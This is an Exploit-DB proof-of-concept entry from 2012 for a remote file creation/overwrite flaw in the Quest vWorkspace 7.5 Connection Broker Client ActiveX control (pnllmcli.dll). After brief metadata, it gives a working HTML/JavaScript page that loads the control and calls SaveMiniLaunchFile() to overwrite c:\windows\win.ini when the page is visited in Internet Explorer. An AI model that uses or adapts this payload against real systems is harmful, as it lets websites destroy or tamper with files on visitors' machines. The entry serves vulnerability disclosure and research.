Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite

EDB-ID:

18704

CVE:



Author:

rgod

Type:

remote


Platform:

Windows

Date:

2012-04-05


<!--
Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547) 
SaveMiniLaunchFile() Method Remote File Creation / Overwrite

ie7/8

vendor site: http://www.quest.com/
file tested: Quest_vWorkspace-75--32-bit_75.zip

Binary Path: C:\WINDOWS\system32\pnllmcli.dll
CLSID: {D9397163-A2DB-4A4A-B2C9-34E876AF2DFC}
Progid: PNLLM.Client.1
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<html>
<script>
  var obj = new ActiveXObject("PNLLM.Client.1");
  obj.SaveMiniLaunchFile("","c:\\windows\\win.ini");
</script>